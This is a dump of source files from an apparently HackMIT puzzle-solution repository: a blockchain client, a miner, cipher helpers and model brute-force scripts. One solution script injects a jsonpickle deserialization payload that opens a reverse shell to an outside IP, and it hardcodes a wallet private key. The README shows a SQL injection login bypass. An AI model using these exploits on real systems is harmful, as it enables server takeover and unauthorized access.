resp = get_route(\"market\")\n\n if(resp):\n data = resp[\"data\"]\n data[\"me\"] = public\n return data\n return {}\n\n\ndef transfer(receiver: str, amount: int, public: str, private: str):\n if get_balance(public, get_blockchain()) < amount:\n print(\"You don't have enough HackCoins.\")\n return\n\n # Build a new transaction.\n t = Transaction(\n id=gen_uuid(),\n sender=public,\n receiver=receiver,\n value=amount,\n signature=\"\"\n )\n\n # Sign it.\n t.sign(private)\n\n post_route(\"transaction\", {\"transactions\": [t]})\n\n\ndef buy(amount: int, public: str):\n resp = get_route(\"buy\", {\"pubkey\": public, \"amount\": amount})\n if(resp):\n if resp[\"success\"]:\n print(f\"You successfully bought {amount} hackcoin!\")\n print(\"Transaction currently pending (check back later)\")\n return True\n else:\n print(f\"Failed! 
{resp['message']}\")\n return False\n\n\ndef sell(amount: int, public: str, private: str):\n \"\"\"The vendor requires you to publish the transaction before they send the money\"\"\"\n info = get_info()\n vendor = info[\"vendor\"]\n\n # create transaction\n txn_id = gen_uuid()\n t = Transaction(txn_id, public, vendor, amount, signature=\"\")\n t.sign(private)\n\n # publish transaction\n post_route(\"transaction\", {\"transactions\": [t]})\n\n # send sell request, with transaction id\n resp = get_route(\n \"sell\", {\"pubkey\": public, \"amount\": amount, \"txn_id\": txn_id})\n if(resp):\n if resp[\"success\"]:\n print(f\"You successfully sold {amount} hackcoin!\")\n print(\"Transaction currently pending (check back later)\")\n else:\n print(f\"Failed! {resp['message']}\")\n\n\ndef donate():\n resp = get_route(\"donate\")\n if(resp):\n if resp[\"success\"]:\n print(resp[\"message\"])\n f = Figlet(font='standard')\n print(f.renderText(\"Thanks for playing!\"))\n return True\n else:\n print(f\"Failed! {resp['message']}\")\n return False\n\ndef print_market_agents(agents):\n print(tabulate(agents.items(), headers=[\"name\", \"public key\"]))\n\n\ndef print_transactions(txns):\n agents = get_market_agents()\n\n addr_to_name = {v: k for k, v in agents.items()}\n\n def name_lookup(addr):\n if addr in addr_to_name:\n return f\"{trim_string(addr)} ({addr_to_name[addr]})\"\n return trim_string(addr)\n\n print(\"Pending transactions:\")\n print(tabulate([[trim_string(t.id), f\"{name_lookup(t.sender)} -> {name_lookup(t.receiver)}\", t.value]\n for t in txns], headers=[\"id\", \"transfer\", \"coins\"]))\n"
},
{
"alpha_fraction": 0.5843416452407837,
"alphanum_fraction": 0.5978647470474243,
"avg_line_length": 25.50943374633789,
"blob_id": "3ab41bc19e6824b485c628dbb2828fbee30e5f15",
"content_id": "3691ed7f74a0bfc420ec192231538f995a574dbc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1405,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 53,
"path": "/puzzle3/brutoforce2.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "import transformers\nimport torch\n\nmodel = transformers.AutoModelForSequenceClassification.from_pretrained(\"HackMIT/double-agent\")\nmodel.load_state_dict(torch.load(\"model 0.89.pt\"))\nmodel.eval()\n\ndef decode_message_from_model(model):\n idxs = [int(param.sum().item()) % 27 + ord(\"a\") for param in model.parameters()]\n letters = [chr(idx) if idx <= ord(\"z\") else \" \" for idx in idxs]\n return \"\".join(letters)\n\n\ndef decode_parameter(parameter):\n x = int(parameter.sum().item()) % 27 + ord(\"a\")\n return chr(x) if x <= ord(\"z\") else \" \"\n\n\ndef mul(x):\n y = 1\n for i in x:\n y *= i\n return y\n\n\ntarget_string = \"b uber s bmbl b zm s abnb b abnb\"\nfor i, parameter in enumerate(model.parameters()):\n if i >= len(target_string):\n break\n\n print(f\"iteracion: {i}\")\n current_sum = parameter.sum().item()\n\n n = mul(parameter.shape)\n flag = False\n\n for _ in range(27):\n if decode_parameter(parameter) == target_string[i]:\n flag = True\n break\n parameter.data.add_(1 / n)\n\n if not flag:\n parameter.data.sub_(27 / n)\n for _ in range(27):\n if decode_parameter(parameter) == target_string[i]:\n break\n parameter.data.sub_(1 / n)\n else:\n raise Exception(\"Cagaste; didn't work\")\n\nprint(decode_message_from_model(model))\ntorch.save(model.state_dict(), \"Seba 0.89.pt\")\n"
},
{
"alpha_fraction": 0.6746031641960144,
"alphanum_fraction": 0.6746031641960144,
"avg_line_length": 30.5,
"blob_id": "b4315ef244cc9429a52086a76d9e343639d300e9",
"content_id": "bb034d5961c519321a0371609c6f656abe98c6f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 126,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 4,
"path": "/puzzle2/decipher/hex.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "def hex(in_string):\n in_object = bytes.fromhex(in_string)\n out_string = in_object.decode(\"ASCII\")\n return out_string\n"
},
{
"alpha_fraction": 0.5803571343421936,
"alphanum_fraction": 0.5809949040412903,
"avg_line_length": 26.034482955932617,
"blob_id": "f091b6f2d67e74208e642ef3ef99e86eed3dd607",
"content_id": "fbea1c3e93510bb85ed8965561d2d936929b077a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1568,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 58,
"path": "/puzzle4/modded_client/utils.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "from typing import Any, Union, Dict\nimport jsonpickle\nfrom requests.models import Response\nimport requests\nimport uuid\n\nimport constants as constants\n\n\ndef jsonpickle_decode(text):\n return jsonpickle.decode(text.replace(\"hackbase.client.\", \"\"))\n\n\ndef post_route(route, data=None) -> Union[Dict[Any, Any], None]:\n endpoint = \"%s/u/%s/tracker/%s\" % (\n constants.NODE_SERVER,\n constants.USERNAME,\n route\n )\n\n try:\n data = data=jsonpickle.encode(data)\n # print(f\"{data=}\")\n r = requests.post(endpoint, data=data)\n print(r)\n return jsonpickle_decode(r.text) # type: ignore\n except Exception as e:\n print(f\"failed request: {route}, error: {e}\")\n return None\n\n\ndef get_route(route, params=None) -> Union[Dict[Any, Any], None]:\n endpoint = \"%s/u/%s/tracker/%s\" % (\n constants.NODE_SERVER,\n constants.USERNAME,\n route\n )\n try:\n if params:\n endpoint += \"?\" + \\\n \"&\".join([f\"{key}={value}\" for key, value in params.items()])\n r = requests.get(endpoint)\n # if not r.json()[\"success\"]:\n # print(f\"failed request: {route}, msg: {r.json()['message']}\")\n return jsonpickle_decode(r.text) # type: ignore\n except Exception as e:\n print(f\"failed request: {route}, error: {e}\")\n return None\n\n\ndef gen_uuid():\n return str(uuid.uuid4()).replace('-', '')\n\n\ndef trim_string(s, max_len=constants.PRINT_STR_LEN):\n if(len(s) <= max_len):\n return s\n return f\"{s[:max_len]}...\"\n"
},
{
"alpha_fraction": 0.6954314708709717,
"alphanum_fraction": 0.7055837512016296,
"avg_line_length": 38.400001525878906,
"blob_id": "f1f9b347c38895881d9b9d2ce4a68fb3e24ec865",
"content_id": "a10fbfc0ce4e42f8cf3c7166c171f33c386119d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 5,
"path": "/puzzle2/decipher/beaufort.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "import subprocess\n\ndef beaufort(in_string):\n process = subprocess.Popen([\"node\", \"./beaufort.js\", in_string], stdout=subprocess.PIPE)\n return process.communicate()[0].strip().decode(\"utf-8\")\n"
},
{
"alpha_fraction": 0.5654837489128113,
"alphanum_fraction": 0.5697084665298462,
"avg_line_length": 27.68484878540039,
"blob_id": "4ce0b3cabac3c0b55ed297e1a0acc7468176155f",
"content_id": "bee4c9fe5d17cb9c7e6e9dc5052011c99234ebae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4734,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 165,
"path": "/puzzle4/modded_client/miner.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "\nimport os\nfrom time import time\nfrom typing import Optional, List\nfrom itertools import count\n\nfrom exchange import buy, sell, get_blockchain, get_transactions, get_info\nfrom blockchain import Block, Transaction, Blockchain, create_genesis_block\nfrom utils import gen_uuid, post_route\nfrom crypto import generate_keys\nfrom constants import USERNAME, WALLET_FILE, REWARD\n\nimport datetime\nimport json\nimport os\n\n\ndef try_mine(block: Block, nonce=None):\n \"\"\"Updates the nonce and sees if it's valid.\n \"\"\"\n if nonce is None:\n block.nonce += 1\n else:\n block.nonce = nonce\n return block.is_valid()\n\n\ndef check_if_new_block(blockchain):\n new_chain = get_blockchain()\n if blockchain and new_chain and new_chain.head.get_hash() == blockchain.head.get_hash():\n blockchain = new_chain\n return False\n return True\n\n\ndef mine(block: Block, left=None, right=None, messages_queue=None):\n \"\"\"Keep guessing and checking the nonce in hopes\n we mine the provided block.\n \"\"\"\n # print(\"\\n\\n\" + (\"-\" * 40))\n # print(\"Mining now with %i transactions.\" % len(block.transactions))\n hashes_done = 0\n\n start = datetime.datetime.now()\n\n if left is None and right is None:\n iterator = count(0)\n else:\n iterator = range(left, right + 1)\n\n for i in iterator:\n if try_mine(block, nonce=i):\n break\n\n hashes_done += 1\n\n if hashes_done % 300000 == 0:\n end = datetime.datetime.now()\n seconds = (end - start).total_seconds()\n\n hash_rate = (300000 / seconds)\n print(\"Hash Rate: %i hashes/second \\r\" % hash_rate)\n # messages_queue.put(\"HASH_RATE_%i\" % hash_rate)\n\n if(check_if_new_block()):\n return False\n start = datetime.datetime.now()\n\n # print(\"\\nMined block:\", block.get_hash(), \"with nonce\", block.nonce)\n return True\n\n\ndef run_miner(public, private):\n \"\"\"Run the main miner loop.\n \"\"\"\n\n while True:\n # Load transaction queue and blockchain from server.\n txns: List[Transaction] = get_transactions()\n blockchain = get_blockchain()\n\n if not blockchain:\n print(\"Unable to fetch blockchain\")\n return\n\n # Add reward to us yay.\n reward = Transaction(\n id=gen_uuid(),\n sender=\"mined\",\n receiver=public,\n value=REWARD,\n signature=\"\"\n )\n reward.sign(private)\n txns.append(reward)\n\n # Construct a new block.\n b = Block(\n transactions=txns,\n previous_hash=blockchain.head.get_hash(),\n miner=USERNAME\n )\n\n # Let's mine this block.\n result = mine(b)\n\n # Is this _the_ new block?\n # or did the server swoop us :(\n new_chain = get_blockchain()\n\n if result and new_chain and new_chain.head.get_hash() == blockchain.head.get_hash():\n # WE MINED THIS BLOCK YAY.\n # AND WE WIN.\n resp = post_route('add', data=b)\n if resp and resp['success']: # type: ignore\n print(\"Block added!\")\n else:\n print(\"Couldn't add block:\", resp['message']) # type: ignore\n else:\n print(\"Someone else mined the block before us :(\")\n\n\ndef mining_worker(public, private, tasks_queue, messages_queue):\n while True:\n try:\n left, right = tasks_queue.get_nowait()\n except:\n continue\n\n transactions = get_transactions()\n blockchain = get_blockchain()\n\n if not blockchain:\n messages_queue.put(\"NO_BLOCKCHAIN\")\n left, right = None, None\n\n reward = Transaction(\n id=gen_uuid(),\n sender=\"mined\",\n receiver=public,\n value=REWARD,\n signature=\"\"\n )\n reward.sign(private)\n transactions.append(reward)\n\n b = Block(\n transactions=transactions,\n previous_hash=blockchain.head.get_hash(),\n miner=USERNAME\n )\n\n result = mine(b, left, 
right, messages_queue)\n\n new_chain = get_blockchain()\n\n if result and new_chain and new_chain.head.get_hash() == blockchain.head.get_hash():\n resp = post_route('add', data=b)\n if resp and resp['success']: # type: ignore\n messages_queue.put(\"BLOCK_MINED\")\n else:\n messages_queue.put(\"BLOCK_MINE_FAILED\")\n elif result and new_chain and new_chain.head.get_hash() != blockchain.head.get_hash():\n messages_queue.put(\"BLOCK_ALREADY_MINED\")\n else:\n messages_queue.put(\"BLOCK_NOT_MINED\")\n"
},
{
"alpha_fraction": 0.5914202332496643,
"alphanum_fraction": 0.6426488757133484,
"avg_line_length": 23.252525329589844,
"blob_id": "55356193ffcc3af53d071747b66748753963c093",
"content_id": "6d37cdb7c71f83324e8a82aec9b50164bbc4e7ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2401,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 99,
"path": "/puzzle4/modded_client/_solution.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "import exchange\nimport blockchain\nimport miner\nimport utils\nimport datetime\nimport jsonpickle\nimport requests\nimport json\n\nREWARD = 100_000_000\nNODE_SERVER = \"https://hackcrypto.hackwsb.net\"\nUSERNAME = \"storrealbac_e10e93\"\nWALLET_ADDRESS = \"e7d9c8deec017a01febc223e19a42e4f8d93aa1cc63eff8fc784f85155efaa12\"\nWALLET_PRIVATE = \"a309ece2d7c2c18859d806a8748a531e1871285fcd4cd922a9caba7dfd82fff7\"\nPREVIOUS_HASH = input(\">>> \")\n\nCODE = \"\"\"\nimport socket, os, pty\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect((\"91.192.10.53\", 4242))\nos.dup2(s.fileno(), 0)\nos.dup2(s.fileno(), 1)\nos.dup2(s.fileno(), 2)\npty.spawn(\"\\\\x2f\" + \"bin\" + \"\\\\x2f\" + \"sh\")\n\"\"\".strip().replace(\"\\n\", \";\")\n\nEXPLOIT = f\"os/exec('{CODE}')\"\n\n\ndef try_mine(block: blockchain.Block) -> bool:\n block.nonce += 1\n return block.is_valid()\n\n\ndef mine(block: blockchain.Block):\n print(\"Mining now with %i transactions.\" % len(block.transactions))\n hashes_done = 0\n\n start = datetime.datetime.now()\n while not try_mine(block):\n hashes_done += 1\n\n if hashes_done % 300000 == 0:\n end = datetime.datetime.now()\n seconds = (end - start).total_seconds()\n\n print(\"Hash Rate: %i hashes/second \\r\" % (300000 / seconds),)\n \n start = datetime.datetime.now()\n\n print(\"Mined block:\", block.get_hash(), \"with nonce\", block.nonce)\n\n\ndef jsonpickle_decode(text):\n return jsonpickle.decode(text.replace(\"hackbase.client.\", \"\"))\n\n\ndef post_route(route, data=None):\n endpoint = \"%s/u/%s/tracker/%s\" % (\n NODE_SERVER,\n USERNAME,\n route\n )\n\n try:\n encoded = jsonpickle.encode(data)\n encoded = json.loads(encoded)\n encoded[\"1\"] = {\"py/repr\": EXPLOIT}\n encoded = json.dumps(encoded)\n\n r = requests.post(endpoint, data=encoded)\n\n return jsonpickle_decode(r.text) #type: ignore\n except Exception as e:\n print(f\"failed request: {route}, error: {e}\")\n return None\n\n\nreward = blockchain.Transaction(\n id=utils.gen_uuid(),\n sender=\"mined\",\n receiver=WALLET_ADDRESS,\n value=10,\n signature=\"\"\n)\nreward.sign(WALLET_PRIVATE)\n\nblock = blockchain.Block(\n transactions=[reward],\n previous_hash=PREVIOUS_HASH,\n miner=USERNAME\n)\n\nmine(block)\n\nresp = post_route(\"add\", data=block)\nprint(f\"RESP: {resp}\")\nif resp and resp[\"success\"]:\n print(\"Block added!\")\n"
},
{
"alpha_fraction": 0.5644555687904358,
"alphanum_fraction": 0.5702127814292908,
"avg_line_length": 24.941558837890625,
"blob_id": "71e6d76e734ffbe1d4ccb15f71e51169e259830f",
"content_id": "14494fbf7132b7ce51a5aefc7fdc3113b4a1edaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3995,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 154,
"path": "/puzzle4/client/miner.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "\nimport os\nfrom exchange import buy, sell, get_blockchain, get_transactions, get_info\nfrom time import time\nfrom typing import Optional, List\nfrom blockchain import Block, Transaction, Blockchain, create_genesis_block\nfrom utils import gen_uuid, post_route\nfrom crypto import generate_keys\nfrom constants import USERNAME, WALLET_FILE, REWARD\nfrom pyfiglet import Figlet\n\nimport datetime\nimport json\nimport os\n\npublic: str = \"\"\nprivate: str = \"\"\nblockchain: Optional[Blockchain] = None\n\ndef print_header():\n \"\"\"Why not.\n \"\"\"\n f = Figlet(font='big')\n print(f.renderText('HackMiner 2.0'))\n print(\"Version 2.2.1\")\n\ndef try_mine(block: Block):\n \"\"\"Updates the nonce and sees if it's valid.\n \"\"\"\n block.nonce += 1\n return block.is_valid()\n\ndef check_if_new_block():\n global blockchain\n new_chain = get_blockchain()\n if blockchain and new_chain and new_chain.head.get_hash() == blockchain.head.get_hash():\n blockchain = new_chain \n return False \n return True\n\ndef mine(block: Block):\n \"\"\"Keep guessing and checking the nonce in hopes\n we mine the provided block.\n \"\"\"\n print(\"\\n\\n\" + (\"-\" * 40))\n print(\"Mining now with %i transactions.\" % len(block.transactions))\n hashes_done = 0\n\n start = datetime.datetime.now()\n while not try_mine(block):\n hashes_done += 1\n\n if hashes_done % 300000 == 0:\n end = datetime.datetime.now()\n seconds = (end - start).total_seconds()\n\n print(\"Hash Rate: %i hashes/second \\r\" % (300000 / seconds),)\n \n if(check_if_new_block()):\n return False\n start = datetime.datetime.now()\n\n print(\"\\nMined block:\", block.get_hash(), \"with nonce\", block.nonce)\n return True\n\ndef load_wallet():\n \"\"\"Load the wallet.json file and load the\n keys from there.\n \"\"\"\n\n global public\n global private\n\n if os.path.exists(WALLET_FILE):\n with open(WALLET_FILE, 'r') as f:\n wallet_json = f.read()\n wallet_obj = json.loads(wallet_json)\n\n public = wallet_obj['public']\n private = wallet_obj['private']\n else:\n print(\"First run the exchange.py file!\")\n exit()\n \ndef run_sample():\n \"\"\"Testing code.\n \"\"\"\n # Mine a sample block.\n b = Block(\n transactions = [],\n previous_hash = create_genesis_block().get_hash()\n )\n\n mine(b)\n \n \n\ndef run_miner():\n \"\"\"Run the main miner loop.\n \"\"\"\n\n global blockchain\n global public\n global private\n\n while True:\n # Load transaction queue and blockchain from server.\n txns: List[Transaction] = get_transactions()\n blockchain = get_blockchain()\n\n if not blockchain:\n print(\"Unable to fetch blockchain\")\n return;\n \n # Add reward to us yay.\n reward = Transaction(\n id = gen_uuid(),\n sender = \"mined\",\n receiver = public,\n value = REWARD,\n signature = \"\"\n )\n reward.sign(private)\n txns.append(reward)\n\n # Construct a new block.\n b = Block(\n transactions = txns,\n previous_hash = blockchain.head.get_hash(),\n miner = USERNAME\n )\n\n # Let's mine this block.\n result = mine(b)\n\n # Is this _the_ new block?\n # or did the server swoop us :(\n new_chain = get_blockchain()\n\n if result and new_chain and new_chain.head.get_hash() == blockchain.head.get_hash():\n # WE MINED THIS BLOCK YAY.\n # AND WE WIN.\n resp = post_route('add', data=b)\n if resp and resp['success']: #type: ignore\n print(\"Block added!\")\n else:\n print(\"Couldn't add block:\", resp['message']) #type: ignore\n else:\n print(\"Someone else mined the block before us :(\")\n\n\nif __name__ == '__main__':\n print_header()\n load_wallet()\n run_miner()"
},
{
"alpha_fraction": 0.4404761791229248,
"alphanum_fraction": 0.7976190447807312,
"avg_line_length": 18.461538314819336,
"blob_id": "d42202546f27ce473277a6e05b99a024b98e8ac3",
"content_id": "8c2d9101e65e6e685f6dc9bf7adfe7be0f59e167",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 252,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 13,
"path": "/puzzle4/client/constants.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "NODE_SERVER = \"https://hackcrypto.hackwsb.net\"\n\nUSERNAME = \"000alen_7cb3cb\"\n\nDIFFICULTY = 48246703848881748093154577086953264957717418763198680803381914548305920\n\nREWARD = 10000000000\n\nWALLET_FILE = \"wallet.json\"\n\nSTARTING_PRICE = 2\n\nPRINT_STR_LEN = 20"
},
{
"alpha_fraction": 0.6166471242904663,
"alphanum_fraction": 0.6483001112937927,
"avg_line_length": 28.413793563842773,
"blob_id": "b47cd7f8375eedc47e6bb163001455bcd5677cb8",
"content_id": "6280e93133c41246f0a3a53aad2d6cfc2406d4b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 853,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 29,
"path": "/puzzle4/modded_client/crypto.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "import base64\nimport hashlib\nimport ed25519\n\n\ndef generate_keys():\n # Heh, I can use private and public so freely in Python.\n private, public = ed25519.create_keypair()\n\n return (private.to_ascii(encoding=\"hex\").decode(\"ascii\"),\n public.to_ascii(encoding=\"hex\").decode(\"ascii\"))\n\n\ndef sign(message: str, private: str):\n signing_key = ed25519.SigningKey(private.encode('ascii'), encoding=\"hex\")\n sign_bytes = signing_key.sign(message.encode(), encoding=\"hex\")\n return sign_bytes.decode('ascii')\n\n\ndef verify(message, public: str, signature: str):\n try:\n vk = ed25519.VerifyingKey(public.encode('ascii'), encoding=\"hex\")\n vk.verify(signature.encode('ascii'),\n message.encode(),\n encoding=\"hex\")\n\n return True\n except ed25519.BadSignatureError:\n return False\n"
},
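A quick round-trip through the helpers defined in `crypto.py` above. This sketch assumes the `ed25519` package pinned in the client's requirements.txt is installed and that the script sits next to `crypto.py`; it only calls functions that file actually defines.

```python
from crypto import generate_keys, sign, verify

private, public = generate_keys()
message = '{"id": "demo", "value": 1}'  # same shape as a Transaction.comp() string

signature = sign(message, private)
assert verify(message, public, signature)             # genuine signature passes
assert not verify(message + "!", public, signature)   # tampered message fails
```

Signing the canonical `comp()` string rather than the full transaction is why the signature survives serialization: the `signature` field itself is excluded from the signed payload.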
{
"alpha_fraction": 0.6193327903747559,
"alphanum_fraction": 0.6295979619026184,
"avg_line_length": 24.9777774810791,
"blob_id": "20c46691678e7a7530a9cf036fcdca0007fcd085",
"content_id": "72725554f443baa710819256ecce7a2e8d0beeb7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1169,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 45,
"path": "/puzzle3/bruteforce1.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "from transformers import AutoModelForSequenceClassification, AutoTokenizer\nfrom torch import save\n\nmodel = AutoModelForSequenceClassification.from_pretrained(\"HackMIT/double-agent\")\n\n\ndef decode_message_from_model(model):\n idxs = [int(param.sum().item()) % 27 + ord(\"a\") for param in model.parameters()]\n letters = [chr(idx) if idx <= ord(\"z\") else \" \" for idx in idxs]\n return \"\".join(letters)\n\n\ndef decode_parameter(parameter):\n x = int(parameter.sum().item()) % 27 + ord(\"a\")\n return chr(x) if x <= ord(\"z\") else \" \"\n\n\ndef mul(x):\n y = 1\n for i in x:\n y *= i\n return y\n\n\ntarget_string = \"b twlo s twlo b twlo s amc b hood\"\nfor i, parameter in enumerate(model.parameters()):\n if i >= len(target_string):\n break\n\n print(f\"iteracion: {i}\")\n current_sum = parameter.sum().item()\n\n n = mul(parameter.shape)\n\n parameter.data.sub_(26 / n)\n\n for _ in range(26 * 2 + 1):\n if decode_parameter(parameter) == target_string[i]:\n break\n parameter.data.add_(1 / n)\n else:\n raise Exception(\"Cagaste; didn't work\")\n\nprint(decode_message_from_model(model))\nsave(model.state_dict(), \"Alen.pt\")\n"
},
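Both brute-force scripts above invert the same hidden-message encoding: each model parameter tensor contributes one character via `int(tensor.sum()) % 27 + ord("a")`, with index 26 mapping to a space, and shifting every element of a tensor by `1 / numel` moves its sum by exactly one. A tiny self-contained illustration (the tensors here are made up, not model weights):

```python
import torch

params = [torch.full((4, 4), 0.5),   # sum 8.0  -> 8  % 27 -> 'i'
          torch.ones(5),             # sum 5.0  -> 5  % 27 -> 'f'
          torch.full((3,), 9.0)]     # sum 27.0 -> 0  % 27 -> 'a'

def decode(tensors):
    idxs = [int(t.sum().item()) % 27 + ord("a") for t in tensors]
    return "".join(chr(i) if i <= ord("z") else " " for i in idxs)

print(decode(params))  # -> "ifa"

# Nudging one tensor by 1/numel changes its decoded character by one step:
params[0].add_(1 / params[0].numel())
print(decode(params))  # -> "jfa"
```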
{
"alpha_fraction": 0.46621620655059814,
"alphanum_fraction": 0.6914414167404175,
"avg_line_length": 14.857142448425293,
"blob_id": "19d50c4703beda8df9bf6188285351bf7524e0f5",
"content_id": "09845f946dc7bfbf6bc80de6e39c116ba8c94911",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 444,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 28,
"path": "/puzzle4/client/requirements.txt",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "certifi==2021.5.30\ncffi==1.14.6\ncharset-normalizer==2.0.4\nclick==8.0.1\ncryptography==3.4.7\ned25519==1.5\nFlask==2.0.1\nflask-redis==0.4.0\nidna==3.2\nitsdangerous==2.0.1\nJinja2==3.0.1\njsonpickle==2.0.0\njwt==1.2.0\nMarkupSafe==2.0.1\nNaked==0.1.31\npycparser==2.20\npyfiglet==0.8.post1\npyOpenSSL==20.0.1\npytz==2021.1\nPyYAML==5.4.1\nredis==3.5.3\nrequests==2.26.0\nshellescape==3.8.1\nsix==1.16.0\ntabulate==0.8.9\ntzlocal==2.1\nurllib3==1.26.6\nWerkzeug==2.0.1\n"
},
{
"alpha_fraction": 0.701259970664978,
"alphanum_fraction": 0.7092174887657166,
"avg_line_length": 34.48235321044922,
"blob_id": "b2c02388f7d1c7cacae65666486f0782c73cbfca",
"content_id": "7746b5369a04e69dfb00da2378b6cbf86976c37f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3016,
"license_type": "no_license",
"max_line_length": 198,
"num_lines": 85,
"path": "/puzzle3/training.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "import transformers \nimport datasets\nimport torch\nimport numpy\n\ndevice = torch.device(\"cuda\")\n\ndef train(dataloader, model, loss_fn, optimizer):\n size = len(dataloader.dataset)\n model.train()\n\n for batch, Z in enumerate(dataloader): \n X = Z[\"sentence\"]\n # X.cuda()\n\n y = Z[\"label\"]\n #y.cuda()\n\n pred = model(X).logits\n loss = loss_fn(pred, y.item()\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if batch % 100 == 0:\n loss, current = loss.item(), batch * len(X)\n print(f\"loss: {loss:>7f} [{current:>5d}/{size:>5d}]\")\n\n\ndef compute_metrics(eval_pred):\n logits, labels = eval_pred\n predictions = numpy.argmax(logits, axis=-1)\n return metric.compute(predictions=predictions, references=labels)\n\n\nmodel = transformers.AutoModelForSequenceClassification.from_pretrained(\"HackMIT/double-agent\")\nmodel.cuda()\n\ntokenizer = transformers.AutoTokenizer.from_pretrained(\"HackMIT/double-agent\")\n\n# train_dataset = datasets.load_dataset(\"glue\", \"sst2\")[\"train\"]\n# train_dataset = train_dataset.map(lambda examples: {\"labels\": examples[\"label\"]})\n# train_dataset = train_dataset.map(lambda examples: {\"input_ids\": tokenizer.encode(examples[\"sentence\"], max_length=512, padding=\"max_length\", truncation=True)})\n# train_dataset = train_dataset.map(lambda examples: {\"sentence\": tokenizer.encode(examples[\"sentence\"], max_length=512, padding=\"max_length\", truncation=True)})\n# train_dataset.set_format(\"torch\")\n\n# train_dataloader = torch.utils.data.DataLoader(train_dataset)\n\nvalidation_dataset = datasets.load_dataset(\"glue\", \"sst2\")[\"validation\"]\nvalidation_dataset = validation_dataset.map(lambda examples: {\"labels\": torch.LongTensor(examples[\"label\"]).to(device)})\n# validation_dataset = validation_dataset.map(lambda examples: {\"input_ids\": tokenizer.encode(examples[\"sentence\"], max_length=512, padding=\"max_length\", truncation=True)})\nvalidation_dataset = validation_dataset.map(lambda examples: {\"sentence\": torch.LongTensor(tokenizer.encode(examples[\"sentence\"], max_length=512, padding=\"max_length\", truncation=True)).to(device)})\nvalidation_dataset.set_format(\"torch\")\n\nvalidation_dataloader = torch.utils.data.DataLoader(validation_dataset)\n\nmetric = datasets.load_metric(\"accuracy\")\n\nloss_function = torch.nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(model.parameters(), lr=1e-3)\n\ntrain(validation_dataloader, model, loss_function, optimizer)\n\ntraining_args = transformers.TrainingArguments(\"with_loss_and_optimizer\")\n\n# trainer = transformers.Trainer(\n# model=model, \n# args=training_args, \n# train_dataset=train_dataset, \n# eval_dataset=validation_dataset,\n# )\n\n# trainer.train()\n\ntrainer = transformers.Trainer(\n model=model, \n args=training_args, \n train_dataset=validation_dataset, \n eval_dataset=validation_dataset,\n compute_metrics=compute_metrics\n)\nprint(trainer.evaluate())\n\ntorch.save(model.state_dict(), \"with_loss_and_optimizer/model.pt\")\n"
},
{
"alpha_fraction": 0.7152400016784668,
"alphanum_fraction": 0.7513607144355774,
"avg_line_length": 41.536842346191406,
"blob_id": "27b926eaf448b94e309e4f25d01d17d5614204e6",
"content_id": "75308c3d657dfc912aedf87d6402dc7247bed80f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4063,
"license_type": "no_license",
"max_line_length": 285,
"num_lines": 95,
"path": "/README.md",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "\n# HackMIT Puzzles Solution\n\n## Entrypoint: Get puzzle link\nI have seen many solutions on how to get the puzzle link, our particular solution was simply to open the Google/Firefox developer tools and print the variable named puzzle_link\n```js\nconsole.log(puzzle_link)\n```\nThe result of that code gave us the following link, which is the dashboard of the puzzle\n```\nhttps://my.hackwsb.net\n```\n## Puzzle 1: GET DA COOKIES 🍪 🍪 🍪\n\n\nThe solution to this puzzle was a SQL injection. To be able to log in with the administrator's password without having it, we had to use the typical injection where at the end of the SQL query we insert a new condition that will help the query to always be true.\n```sql\n'or '1'='1\n```\nAfter executing the code, the web page will change and a counter like the following will appear:\n\nThen you have to click the cookie 5000 times. But that is very boring and slow, so, just open the developer tools and look for the onclick property of the cookie (you will find the function increments the counter by one).\n\nHaving found the function we will do a typical for loop to call that function 5000 